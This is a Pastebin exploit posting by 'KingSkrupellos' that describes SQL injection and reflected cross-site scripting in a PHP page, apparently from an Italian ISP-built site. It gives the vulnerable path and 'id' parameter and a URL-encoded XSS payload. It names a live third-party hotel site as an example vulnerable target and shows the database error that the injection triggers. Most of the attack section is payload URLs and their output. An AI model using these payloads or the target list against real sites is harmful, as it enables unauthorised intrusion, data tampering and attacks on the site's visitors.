Advertisement
KingSkrupellos

Guest Italy Internet Service Provider Rimini XSS SQL Inj

Jun 13th, 2019
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.67 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Guest Italy Internet Service Provider Rimini XSS SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 14/06/2019
  7. # Vendor Homepage : guest.it
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. CWE-79 [ Improper Neutralization of Input During
  14. Web Page Generation ('Cross-site Scripting') ]
  15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  18.  
  19. ###################################################################
  20.  
  21. # Impact :
  22. ***********
  23. Guest Italy Internet Service Provider is prone to an SQL-injection
  24. vulnerability because it fails to sufficiently sanitize user-supplied data before using
  25. it in an SQL query. Exploiting this issue could allow an attacker to compromise the
  26. application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  27. A remote attacker can send a specially crafted request to the vulnerable application and
  28. execute arbitrary SQL commands in application`s database. Further exploitation of this
  29. vulnerability may result in unauthorized data manipulation.
  30. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  31.  
  32. Reflected XSS (or Non-Persistent) :
  33. ***************************************
  34. The server reads data directly from the HTTP request and reflects it back in the
  35. HTTP response. Reflected XSS exploits occur when an attacker causes a victim to
  36. supply dangerous content to a vulnerable web application, which is then reflected back
  37. to the victim and executed by the web browser. The most common mechanism for delivering
  38. malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed
  39. directly to the victim. URLs constructed in this manner constitute the core of many phishing
  40. schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site.
  41. After the site reflects the attacker's content back to the victim,the content is executed
  42. by the victim's browser.
  43.  
  44. ###################################################################
  45.  
  46. # SQL Injection Exploit :
  47. **********************
  48. /include/eventi_mwc_dettaglio.php?id=[SQL Injection]
  49.  
  50. # Cross Site Scripting XSS Exploit :
  51. ********************************
  52. /include/eventi_mwc_dettaglio.php?id=1%27%3Cmarquee%3E%3C
  53. font%20color=lime%20size=32%3EXSS-Vulnerability-Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E
  54.  
  55. ###################################################################
  56.  
  57. # Example Vulnerable Sites :
  58. *************************
  59. [+] monhotel.it/include/eventi_mwc_dettaglio.php?id=1%27
  60.  
  61. [+] monhotel.it/include/eventi_mwc_dettaglio.php?id=1%27%3Cmarquee%3E%3C
  62. font%20color=lime%20size=32%3EXSS-Vulnerability-Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E
  63.  
  64. ###################################################################
  65.  
  66. # Example SQL Database Error :
  67. ****************************
  68. /include/eventi_mwc_dettaglio.php:
  69. MySQL Error: 1064
  70. You have an error in your SQL syntax; check the manual that
  71. corresponds to your MySQL server version for the right
  72. syntax to use near ''' at line 6
  73. Query: SELECT * FROM eventi_mwc WHERE eventi_id = 1' ;
  74.  
  75. ###################################################################
  76.  
  77. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  78.  
  79. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement